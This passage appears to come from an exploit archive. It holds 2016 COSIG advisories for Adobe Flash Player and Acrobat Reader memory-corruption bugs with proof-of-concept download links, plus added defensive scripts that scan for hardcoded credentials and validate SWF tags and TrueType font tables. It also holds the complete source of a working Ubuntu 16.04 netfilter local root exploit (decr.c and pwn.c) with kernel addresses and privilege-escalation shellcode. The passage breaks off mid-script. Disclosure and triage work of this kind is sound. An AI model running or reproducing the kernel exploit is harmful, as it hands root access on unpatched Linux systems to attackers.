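            hits.append((lineno, m["lhs"], m["lit"]))
    return hits


# Constructed ActionScript built around the line quoted in the advisory.
SAMPLE_SOURCE = """\
// decompiled from Main.swf (constructed sample around the advisory's snippet)
private function onLogin(event:LoginEvent):void {
    if ((((event.getLogin().toLowerCase() == "gsxlogin")) && ((event.getPwd() == "gsxpassword")))){
        grantSuperAdmin();
    } else if (event.getLogin() == "") {
        showError("Login may not be empty");
    } else {
        authService.authenticate(event.getLogin(), event.getPwd());
    }
}
"""

if __name__ == "__main__":
    for lineno, lhs, lit in scan_for_literal_credentials(SAMPLE_SOURCE):
        masked = lit[0] + "*" * (len(lit) - 1)
        print(f"line {lineno}: {lhs} compared with literal {masked}")
```

On the sample this yields exactly the two comparisons from the advisory's snippet, on line 3, and nothing for the empty-string check or the delegated authenticate call. The same pass works on any decompiler output, Java or JavaScript included, since it keys on the comparison shape rather than on ActionScript syntax.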
            
#####################################################################################

# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/avis/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE-2016-4177
# COSIG-2016-21

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

===============
1) Introduction
===============
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices. Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.

(https://en.wikipedia.org/wiki/Adobe_Flash_Player)

#####################################################################################

====================
2) Report Timeline
====================
2016-05-10: Francis Provencher of COSIG reported this vulnerability to Adobe PSIRT;
2016-05-17: Adobe PSIRT confirmed this vulnerability;
2016-07-12: Adobe published a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;

#####################################################################################

=====================
3) Technical details
=====================

The vulnerability allows a remote attacker to execute malicious code or to access part of the dynamically allocated memory. Exploitation requires user interaction:
the victim must visit a web page or open a specially crafted SWF file that contains invalid ‘SceneAndFrameData’ data.

#####################################################################################

===========
4) POC:
===========

https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-21.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40104.zip

###############################################################################
            
#####################################################################################

# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/avis/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE-2016-4176
# COSIG-2016-20

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

===============
1) Introduction
===============
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices. Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.

(https://en.wikipedia.org/wiki/Adobe_Flash_Player)

#####################################################################################

====================
2) Report Timeline
====================
2016-05-10: Francis Provencher of COSIG reported this vulnerability to Adobe PSIRT;
2016-05-17: Adobe PSIRT confirmed this vulnerability;
2016-07-12: Adobe published a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;

#####################################################################################

=====================
3) Technical details
=====================

The vulnerability allows a remote attacker to execute malicious code or to access part of the dynamically allocated memory. Exploitation requires user interaction:
the victim must visit a web page or open a specially crafted SWF file that contains invalid ‘TAG’ data.

#####################################################################################

===========
4) POC:
===========

https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-20.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40105.zip

###############################################################################
            
#####################################################################################

# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE-2016-4175
# COSIG-2016-22

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

================
1) Introduction
================

Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices. Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.

(https://en.wikipedia.org/wiki/Adobe_Flash_Player)

#####################################################################################

====================
2) Report Timeline
====================

2016-05-10: Sébastien Morin of COSIG reported this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirmed this vulnerability;
2016-07-12: Adobe published a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;

#####################################################################################

=====================
3) Technical details
=====================

The vulnerability allows a remote attacker to execute malicious code or to access part of the dynamically allocated memory. Exploitation requires user interaction:
the victim must visit a web page or open a specially crafted SWF file that contains invalid ‘DefineSprite’ data.

#####################################################################################

===========
4) POC:
===========

https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-22-1.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40103.zip

####################################################################################
            
#####################################################################################

# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE-2016-4179
# COSIG-2016-23

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

================
1) Introduction
================

Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices. Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.

(https://en.wikipedia.org/wiki/Adobe_Flash_Player)

#####################################################################################

====================
2) Report Timeline
====================

2016-05-14: Sébastien Morin of COSIG reported this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirmed this vulnerability;
2016-07-12: Adobe published a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;

#####################################################################################

=====================
3) Technical details
=====================

The vulnerability allows a remote attacker to execute arbitrary code or read part of the dynamically allocated memory. User interaction is required: the victim must visit a web page or open a specially crafted SWF file that contains invalid "DefineBitsJPEG2" tag data.
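Both COSIG Flash advisories above (COSIG-2016-22 with DefineSprite, COSIG-2016-23 with DefineBitsJPEG2) come down to a tag whose declared contents do not match what the file holds. When triaging such a sample, the first thing to know is which tag is lying. The walker below is an added example, not COSIG's tooling and not part of either advisory: it parses the SWF header and tag list (short and long tag headers, FWS and zlib-compressed CWS), names the tags of interest from the SWF specification, and flags any tag whose length runs past the end of the file. The sample SWF it builds is constructed here for the demonstration.

```python
import struct
import zlib

# Tag codes from the SWF file format specification (only the ones of interest here)
TAG_NAMES = {
    0: "End", 1: "ShowFrame", 9: "SetBackgroundColor",
    21: "DefineBitsJPEG2", 39: "DefineSprite",
}


def swf_body(data):
    """Return the uncompressed bytes that follow the 8-byte SWF header."""
    sig = data[:3]
    if sig == b"FWS":
        return data[8:]
    if sig == b"CWS":
        return zlib.decompress(data[8:])
    raise ValueError("not an FWS/CWS file (LZMA 'ZWS' is not handled here)")


def header_length(body):
    """Bytes used by the frame-size RECT, frame rate and frame count."""
    nbits = body[0] >> 3                    # top 5 bits: width of each RECT field
    rect_bytes = (5 + 4 * nbits + 7) // 8   # 5 bits + four nbits-wide fields, rounded up
    return rect_bytes + 2 + 2


def swf_tags(data):
    """Yield (code, name, length, data_offset, truncated) for each tag.

    Handles short (6-bit) and long (32-bit) tag headers. `truncated` is True
    when the declared length runs past the end of the body, which is the first
    inconsistency to look for in a crash sample.
    """
    body = swf_body(data)
    pos = header_length(body)
    while pos + 2 <= len(body):
        (code_and_len,) = struct.unpack_from("<H", body, pos)
        code, length = code_and_len >> 6, code_and_len & 0x3F
        pos += 2
        if length == 0x3F:                  # long header: real length follows as u32
            if pos + 4 > len(body):
                raise ValueError("truncated long tag header at offset %d" % pos)
            (length,) = struct.unpack_from("<I", body, pos)
            pos += 4
        truncated = pos + length > len(body)
        yield code, TAG_NAMES.get(code, "Tag%d" % code), length, pos, truncated
        if truncated or code == 0:
            break
        pos += length


def build_sample_swf(sprite_len):
    """Constructed test file: background colour, one DefineSprite, End.

    Only four bytes of sprite data are written, so any sprite_len > 4 declares
    more data than the file actually holds.
    """
    body = b"\x00" + struct.pack("<HH", 12 << 8, 1)          # RECT nbits=0, 12 fps, 1 frame
    body += struct.pack("<H", (9 << 6) | 3) + b"\xff\xff\xff"
    body += struct.pack("<HI", (39 << 6) | 0x3F, sprite_len) + b"\x00" * min(sprite_len, 4)
    body += struct.pack("<H", 0)
    return b"FWS\x0a" + struct.pack("<I", 8 + len(body)) + body


if __name__ == "__main__":
    for swf in (build_sample_swf(4), build_sample_swf(0x1000)):
        for code, name, length, offset, truncated in swf_tags(swf):
            print("%-20s code=%-3d len=0x%-6x at 0x%x%s"
                  % (name, code, length, offset, "  <-- overruns file" if truncated else ""))
        print()
```

On a real sample call `swf_tags(open(path, "rb").read())`. DefineSprite bodies contain a nested tag list; this walker treats the sprite as opaque data, so to inspect the nested tags run `swf_tags`'s loop again over that slice.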

#####################################################################################

===========
4) POC:
===========

https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-23.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40102.zip

####################################################################################
            
#####################################################################################

# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4201
# COSIG-2016-24

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).

(https://en.wikipedia.org/wiki/Adobe_Acrobat)

#####################################################################################

====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG reported this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirmed this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;

#####################################################################################

=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute arbitrary code or read part of the dynamically allocated memory. User interaction is required: the victim must open a specially crafted PDF file that embeds an invalid TrueType font (.ttf) containing malformed data.

#####################################################################################

===========
4) POC
===========

https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-24.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40101.zip

####################################################################################
            
#####################################################################################

# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4206
# COSIG-2016-25

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).

(https://en.wikipedia.org/wiki/Adobe_Acrobat)

#####################################################################################

====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG reported this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirmed this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;

#####################################################################################

=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute arbitrary code or read part of the dynamically allocated memory. User interaction is required: the victim must open a specially crafted PDF file that embeds an invalid TrueType font (.ttf) containing malformed data.

#####################################################################################

===========
4) POC
===========

https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-25.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40100.zip

####################################################################################
            
#####################################################################################

# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4208
# COSIG-2016-27

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).

(https://en.wikipedia.org/wiki/Adobe_Acrobat)

#####################################################################################

====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG reported this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirmed this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;

#####################################################################################

=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute arbitrary code or read part of the dynamically allocated memory. User interaction is required: the victim must open a specially crafted PDF file that embeds an invalid TrueType font (.ttf) containing malformed data.

#####################################################################################

===========
4) POC
===========

https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-27.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40098.zip

####################################################################################
            
#####################################################################################

# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4207
# COSIG-2016-26

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).

(https://en.wikipedia.org/wiki/Adobe_Acrobat)

#####################################################################################

====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG reported this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirmed this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;

#####################################################################################

=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute arbitrary code or read part of the dynamically allocated memory. User interaction is required: the victim must open a specially crafted PDF file that embeds an invalid TrueType font (.ttf) containing malformed data.

#####################################################################################

===========
4) POC
===========

https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-26.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40099.zip

####################################################################################
            
#####################################################################################

# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4203
# COSIG-2016-28

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).

(https://en.wikipedia.org/wiki/Adobe_Acrobat)

#####################################################################################

====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG reported this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirmed this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;

#####################################################################################

=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute arbitrary code or read part of the dynamically allocated memory. User interaction is required: the victim must open a specially crafted PDF file that embeds an invalid TrueType font (.ttf) containing malformed data.

#####################################################################################

===========
4) POC
===========

https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-28.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40097.zip

####################################################################################
            
#####################################################################################

# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin and Pier-Luc Maltais of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4204
# COSIG-2016-29

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).

(https://en.wikipedia.org/wiki/Adobe_Acrobat)

#####################################################################################

====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin and Pier-Luc Maltais of COSIG reported this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirmed this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;

#####################################################################################

=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute arbitrary code or read part of the dynamically allocated memory. User interaction is required: the victim must open a specially crafted PDF file that embeds an invalid TrueType font (.ttf) containing malformed data.

#####################################################################################

===========
4) POC
===========

https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-29.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40096.zip

####################################################################################
            
#####################################################################################

# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin and Pier-Luc Maltais of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4205
# COSIG-2016-30

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).

(https://en.wikipedia.org/wiki/Adobe_Acrobat)

#####################################################################################

====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin and Pier-Luc Maltais of COSIG reported this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirmed this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;

#####################################################################################

=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute arbitrary code or read part of the dynamically allocated memory. User interaction is required: the victim must open a specially crafted PDF file that embeds an invalid TrueType font (.ttf) containing malformed data.
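All seven Acrobat Reader advisories above (COSIG-2016-24 through COSIG-2016-30) hinge on a PDF-embedded TrueType font with inconsistent data. Before handing such a sample to a debugger, a sanity check of the font's table directory narrows down where the parser is being lied to. The checker below is an added example, not COSIG's tooling: it takes the raw font bytes (extract the FontFile2 stream from the PDF with whatever PDF tool you prefer; that step is not shown), validates only the sfnt table directory, and is run over two sample fonts that are constructed here. The checks follow the sfnt layout from the OpenType specification: a 12-byte offset table followed by 16-byte records of tag, checksum, offset and length, big-endian.

```python
import struct

SFNT_VERSIONS = {0x00010000, 0x74727565, 0x4F54544F}   # 1.0, 'true', 'OTTO'
REQUIRED = (b"head", b"hhea", b"maxp")                 # present in every sfnt font
DIR_HEADER = 12                                        # sfnt version, numTables, search fields
RECORD = 16                                            # tag, checksum, offset, length


def check_table_directory(font):
    """Validate the table directory of a TrueType/OpenType blob.

    Returns a list of findings (empty means the directory is self-consistent).
    Table contents are not parsed; the point is to catch offsets and lengths a
    native parser would trust before reading.
    """
    findings = []
    if len(font) < DIR_HEADER:
        return ["file shorter than the %d-byte offset table" % DIR_HEADER]
    version, num_tables = struct.unpack_from(">IH", font, 0)
    if version not in SFNT_VERSIONS:
        findings.append("unexpected sfnt version 0x%08x" % version)
    dir_end = DIR_HEADER + RECORD * num_tables
    if dir_end > len(font):
        findings.append("numTables=%d needs a %d-byte directory but the file is %d bytes"
                        % (num_tables, dir_end, len(font)))
        num_tables = (len(font) - DIR_HEADER) // RECORD   # inspect only the records present
    seen = set()
    for i in range(num_tables):
        tag, _checksum, offset, length = struct.unpack_from(">4sIII", font, DIR_HEADER + RECORD * i)
        name = tag.decode("latin-1")
        if tag in seen:
            findings.append("duplicate table %r" % name)
        seen.add(tag)
        if offset < dir_end:
            findings.append("table %r starts at 0x%x, inside the directory" % (name, offset))
        if offset % 4:
            findings.append("table %r not 4-byte aligned (offset 0x%x)" % (name, offset))
        # Python ints do not wrap: a C parser adding offset + length in uint32
        # would see 0xFFFFFFF0 + 0x20 as 0x10 and pass a naive bounds check.
        if offset + length > len(font):
            findings.append("table %r: offset 0x%x + length 0x%x exceeds file size 0x%x"
                            % (name, offset, length, len(font)))
    for tag in REQUIRED:
        if tag not in seen:
            findings.append("required table %r missing" % tag.decode("latin-1"))
    return findings


def build_sfnt(records, file_size):
    """Constructed sample: a directory of (tag, offset, length) records, zero-padded."""
    blob = struct.pack(">IHHHH", 0x00010000, len(records), 0, 0, 0)
    for tag, offset, length in records:
        blob += struct.pack(">4sIII", tag, 0, offset, length)
    return blob.ljust(file_size, b"\x00")


GOOD_FONT = build_sfnt([(b"head", 80, 54), (b"hhea", 136, 36), (b"maxp", 172, 6)], 180)
# Same directory plus a 'glyf' record whose offset + length wraps a 32-bit adder.
BAD_FONT = build_sfnt([(b"head", 80, 54), (b"hhea", 136, 36), (b"maxp", 172, 6),
                       (b"glyf", 0xFFFFFFF0, 0x20)], 180)

if __name__ == "__main__":
    for label, font in (("good", GOOD_FONT), ("bad", BAD_FONT), ("truncated", GOOD_FONT[:40])):
        print(label + ":", check_table_directory(font) or ["ok"])
```

The wrap-around case is the one worth remembering: a record that passes `offset + length <= size` in 32-bit arithmetic can still point far outside the buffer, which is why the check is done in unbounded integers here and should be done with overflow-safe arithmetic in native code.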

#####################################################################################

===========
4) POC
===========

https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-30.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40095.zip

####################################################################################
            
/*
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40053.zip
*/

--------------------------------------------------- decr.c ---------------------------------------------------
/**
 * Ubuntu 16.04 local root exploit - netfilter target_offset OOB
 * check_compat_entry_size_and_hooks/check_entry
 *
 * Tested on 4.4.0-21-generic. SMEP/SMAP bypass available in descr_v2.c
 *
 * Vitaly Nikolenko
 * vnik@cyseclabs.com
 * 23/04/2016
 *
 *
 * ip_tables.ko needs to be loaded (e.g., iptables -L as root triggers
 * automatic loading).
 *
 * vnik@ubuntu:~$ uname -a
 * Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 * vnik@ubuntu:~$ gcc decr.c -m32 -O2 -o decr
 * vnik@ubuntu:~$ gcc pwn.c -O2 -o pwn
 * vnik@ubuntu:~$ ./decr 
 * netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik
 * [!] Decrementing the refcount. This may take a while...
 * [!] Wait for the "Done" message (even if you'll get the prompt back).
 * vnik@ubuntu:~$ [+] Done! Now run ./pwn
 * 
 * vnik@ubuntu:~$ ./pwn
 * [+] Escalating privs...
 * root@ubuntu:~# id
 * uid=0(root) gid=0(root) groups=0(root)
 * root@ubuntu:~# 
 * 
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>
#include <linux/sched.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ptrace.h>
#include <netinet/in.h>
#include <net/if.h>
#include <linux/netfilter_ipv4/ip_tables.h>
#include <linux/netlink.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <stdint.h>   /* uint32_t / uint64_t used in decr() */

#define MALLOC_SIZE 66*1024

int check_smaep() {
	FILE *proc_cpuinfo;
	char fbuf[512];

	proc_cpuinfo = fopen("/proc/cpuinfo", "r");

	if (proc_cpuinfo == NULL) {
		perror("fopen");
		return -1;
	}

	memset(fbuf, 0, sizeof(fbuf));
	
	while(fgets(fbuf, 512, proc_cpuinfo) != NULL) {
		if (strlen(fbuf) == 0)
			continue;
		
		if (strstr(fbuf, "smap") || strstr(fbuf, "smep")) {
			fclose(proc_cpuinfo);
			return -1;
		}
	}

	fclose(proc_cpuinfo);
	return 0;
}

int check_mod() {
	FILE *proc_modules;
	char fbuf[256];

	proc_modules = fopen("/proc/modules", "r");

	if (proc_modules == NULL) {
		perror("fopen");
		return -1;
	}

	memset(fbuf, 0, sizeof(fbuf));
	
	while(fgets(fbuf, 256, proc_modules) != NULL) {
		if (strlen(fbuf) == 0)
			continue;
		
		if (!strncmp("ip_tables", fbuf, 9)) {
			fclose(proc_modules);
			return 0;
		}
	}

	fclose(proc_modules);
	return -1;
}

int decr(void *p) {
	int sock, optlen;
	int ret;
	void *data;
	struct ipt_replace *repl;
	struct ipt_entry *entry;
	struct xt_entry_match *ematch;
	struct xt_standard_target *target;
	unsigned i;

	sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);

	if (sock == -1) {
	        perror("socket");
	        return -1;
	}

	data = malloc(MALLOC_SIZE);

	if (data == NULL) {
		perror("malloc");
		return -1;
	}

	memset(data, 0, MALLOC_SIZE);

	repl = (struct ipt_replace *) data;
	repl->num_entries = 1;
	repl->num_counters = 1;
	repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;
	repl->valid_hooks = 0;

	entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));
	entry->target_offset = 74; // overwrite target_offset
	entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);

	ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));

	strcpy(ematch->u.user.name, "icmp");
	void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);
	uint64_t *me = (uint64_t *)(kmatch + 0x58);
	*me = 0xffffffff821de10d; // magic number!

	uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);
	*match = (uint32_t)kmatch;
	
	ematch->u.match_size = (short)0xffff;

	target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);
	uint32_t *t = (uint32_t *)target;
	*t = (uint32_t)kmatch;

	printf("[!] Decrementing the refcount. This may take a while...\n");
	printf("[!] Wait for the \"Done\" message (even if you'll get the prompt back).\n");

	for (i = 0; i < 0xffffff/2+1; i++) {
		ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);
	}

	close(sock);
	free(data);
	printf("[+] Done! Now run ./pwn\n");

	return 0;
}

int main(void) {
	void *stack;
	int ret;

	printf("netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\n");
	if (check_mod()) {
		printf("[-] No ip_tables module found! Quitting...\n");
		return -1;
	}

	if (check_smaep()) {
		printf("[-] SMEP/SMAP support detected! Quitting...\n");
		return -1;
	}

	ret = unshare(CLONE_NEWUSER);

	if (ret == -1) {
		perror("unshare");
		return -1;
	}

	stack = (void *) malloc(65536);

	if (stack == NULL) {
		perror("malloc");
		return -1;
	}

	clone(decr, stack + 65536, CLONE_NEWNET, NULL);

	sleep(1);

	return 0;
}

--------------------------------------------------- pwn.c ---------------------------------------------------

/**
 * Run ./decr first!
 *
 * 23/04/2016
 * - vnik
 */
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <stdint.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <assert.h>

#define MMAP_ADDR 0xff814e3000
#define MMAP_OFFSET 0xb0

typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred);
typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred);

void __attribute__((regparm(3))) privesc() {
	commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;
	prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;
        commit_creds(prepare_kernel_cred((uint64_t)NULL));
}

int main() {
	void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0);
	assert(payload == (void *)MMAP_ADDR);

	void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET);

	memset(shellcode, 0, 0x300000);

	void *ret = memcpy(shellcode, &privesc, 0x300);
	assert(ret == shellcode);

	printf("[+] Escalating privs...\n");

	int fd = open("/dev/ptmx", O_RDWR);
	close(fd);

	assert(!getuid());

	printf("[+] We've got root!\n");

	return execl("/bin/bash", "-sh", (char *)NULL);
}
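decr.c above reaches the bug by handing IPT_SO_SET_REPLACE an entry whose target_offset (74) points back inside struct ipt_entry itself and whose match_size is 0xffff. The upstream fix validates these offsets before the kernel touches the target or walks the matches. The script below is an added example, not kernel code and not part of vnik's exploit: a user-space model of those bounds checks, modelled on the checks the upstream fix added to x_tables (xt_check_entry_offsets and the per-match check it performs) and simplified. The layout constants are assumed from the x86-64 uapi header field order; decr.c is built with -m32 and therefore goes through the compat path, whose struct sizes differ, which the model ignores. The blobs it checks are constructed here to mirror how decr.c fills its buffer.

```python
import struct

# x86-64 layout constants, assumed from the uapi header field order
IPT_ENTRY_SIZE = 112          # sizeof(struct ipt_entry): ipt_ip, nfcache, offsets, comefrom, counters
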